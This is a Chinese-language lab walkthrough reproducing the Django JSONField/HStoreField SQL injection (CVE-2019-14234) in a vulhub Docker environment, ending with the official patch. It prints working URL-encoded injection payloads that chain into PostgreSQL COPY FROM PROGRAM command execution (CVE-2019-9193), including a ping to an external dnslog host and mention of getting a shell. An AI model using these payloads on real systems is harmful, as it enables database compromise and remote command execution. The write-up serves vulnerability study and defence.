CVE-2019-14234(DjangoJSONFieldHStoreFieldSQL注⼊漏洞)漏洞描述
1.漏洞编号:CVE-2019-14234
2.影响版本:
1.11.x before 1.11.23
2.1.x before 2.1.11
2.2.x before 2.2.4
3.漏洞产⽣原因:
Django在2019年8⽉1⽇发布了⼀个安全更新,修复了在JSONField、HStoreField两个模型字段中存在的SQL注⼊漏洞。
参考链接:
django登录注册功能- www.djangoproject/weblog/2019/aug/01/security-releases/
- www.leavesongs/PENETRATION/django-jsonfield-cve-2019-14234.html
启动环境:docker-compose up -d
vulnIP:192.168.1.108
环境启动后,访问`your-ip:8000`即可看到Django默认⾸页。
漏洞发现
关注Django的版本
漏洞利⽤
⾸先登陆后台`your-ip:8000/admin/`,⽤户名密码为`admin`、`a123123123`。
登陆后台后,进⼊模型`Collection`的管理页⾯`your-ip:8000/admin/vuln/collection/`:
然后在GET参数中构造`detail__a'b=123`提交,其中`detail`是模型`Collection`中的JSONField:
your-ip:8000/admin/vuln/collection/?detail__a%27b=123
可见,单引号已注⼊成功,SQL语句报错:
CVE-2019-9193:具有数据库服务器⽂件读取权限的攻击者可以利⽤此漏洞执⾏任意系统命令,该漏洞由 PostgreSQL 引发
思路稍加扩展,我们可以利⽤CVE-2019-14234(SQL注⼊漏洞)向服务器传送包含CVE-2019-9193(命令执⾏漏洞)系统命令的SQL语句,从⽽利⽤SQL语句,执⾏任意系统命令。
下⼀步结合CVE-2019-9193我们尝试执⾏命令,构造shell,创建cmd_exec
192.168.1.109:8000/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcreate%20table%20cmd_exec(cmd_output%20text)--%20
页⾯结果虽然报错,但是报错原因是no results to fetch,说明我们的语句已经执⾏
然后⽤dnslog检测是否可以执⾏命令
192.168.1.108:8000/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27ping%20a5ukxy.dnslog%27--%20
成功检测到流量
复现环境⾥的postgresql数据库docker没对外的端⼝映射,如果开了或者真实环境⾥,还可以结合msf通过CVE-2019-9193来getshell
构造命令执⾏语句
192.168.1.109:8000/admin/vuln/collection/?detail__title%27)%3d%271%27%20or%201%3d1%20%3bcopy%20cmd_exec%20FROM%20PROGRAM%20%27touch%20/%27--%20%20命令执⾏结果:当提⽰“no results to fetch”即为执⾏成功。
登录docker查看⽂件创建成功
问题汇总
1.该漏洞需要开发者使⽤了JSONField/HStoreField,且⽤户可控queryset查询时的键名,在键名的位置注⼊SQL语句。Django⾃带的后台应⽤Django-Admin中就存在这样的写法,我们可以直接借助它来复现漏洞。
2.因为使⽤vulhub提供的docker环境,环境部署之后会有两个docker实例,其中实例-1提供Django的web功能,⽽实例-2则提供PostgreSQL数据库功能,所以不
论SQL注⼊的结果还是命令执⾏的结果,都会发⽣在实例-2上,实践中创建的也在实例_2的tmp⽬录下。
修复⽅案
1.⾸先来看看官⽅是如何修复的
⾸先将django/contrib/postgres/fields/hstore.py⽂件⾥⾯的KeyTransform类的as_sql函数中的直接传递
字符传改为了将self.key_name单独使⽤数组进⾏传递,其中%%的意思为"转换说明符",其主要作⽤为直接转化为单个"%"符号⽽不需要参数。类似于\\和\
In[1]:"%%"%()
Out[1]: '%'
# 具体使⽤⽅法如下
In [2]: '%s %%s'%'test'
Out[2]: 'test %s'
之后在django/contrib/postgres/fields/jsonb.py⽂件中将对self.key_name变量的返回统⼀改成了使⽤数组进⾏转换。并且后期在单元测试中加⼊了对JSONField的SQL 注⼊测试
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论